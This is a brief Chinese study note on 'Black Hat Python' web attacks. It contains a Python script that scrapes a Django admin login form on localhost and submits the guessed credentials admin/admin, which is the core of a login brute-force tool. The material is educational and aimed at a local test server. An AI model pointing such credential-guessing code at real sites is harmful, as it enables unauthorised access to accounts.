python 黑帽子读书笔记

python 黑帽子读书笔记

web 攻击

  • 目录和文件位置
  • html 表格认证

实例

django 表格认证


from HTMLParser import HTMLParser
import requests

class LoginForm(HTMLParser):

    def __init__(self):
        HTMLParser.__init__(self)
        self.action = ""
        self.data = {}

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            if 'id' in attrs and attrs['id'] == "login-form":
                self.action = attrs['action']
        elif tag == "input":
            if 'name' in attrs:
                self.data[attrs['name']] = attrs.get('value','')
        else:
            pass


s = requests.Session()
r = s.get("http://127.0.0.1:8000/admin/login/?next=/admin/")
l = LoginForm()
l.feed(r.text)
l.data['username'] = 'admin'
l.data['password'] = 'admin'
print(l.data)
r = s.post('http://127.0.0.1:8000' + l.action, data =l.data)
print(r.text)
Loading Disqus comments...
Table of Contents